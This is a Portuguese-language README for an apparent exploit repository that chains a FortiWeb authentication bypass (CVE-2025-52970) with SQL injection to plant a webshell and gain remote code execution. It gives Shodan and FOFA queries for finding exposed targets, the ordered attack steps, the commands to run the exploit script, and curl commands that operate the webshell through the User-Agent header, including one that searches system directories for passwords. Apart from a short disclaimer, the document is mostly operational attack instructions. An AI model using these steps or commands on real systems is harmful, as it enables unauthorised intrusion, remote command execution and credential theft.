
Demonstra um contorno de autenticação no FortiWeb (CVE-2025-52970) combinado com injeção SQL para fazer upload de uma webshell e obter execução remota de código através de cabeçalhos HTTP.
Este repositório demonstra um bypass de autenticação no FortiWeb que pode ser encadeado para alcançar Execução Remota de Código (RCE).
O exploit aproveita um endpoint vulnerável para injetar payloads SQL, fazer upload de uma webshell e executar comandos através de cabeçalhos HTTP.
⚠️ Aviso:
Este projeto é apenas para fins educacionais e de pesquisa.
NÃO use contra sistemas que você não possui ou não tem permissão explícita para testar.
((FortiWeb)) AND port:("8443")
### FOFA
title="FortiWeb" && port="8443"
### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443
CVE: CVE-2025-52970
Componente: FortiWeb Fabric API (/api/fabric/device/status)
Impacto: Bypass de Autenticação → Injeção SQL → Upload de Webshell → RCE
Vetor: Cabeçalho Authorization manipulado + injeção SQL
Criar e descartar tabela SQL temporária.
Escrever payload da webshell em partes.
Exportar shell para /cgi-bin/x.cgi.
Fazer upload de script Python auxiliar para acionar permissões.
Acessar webshell enviando comandos via cabeçalho User-Agent.
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/
3️⃣ Interagir com a Webshell
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
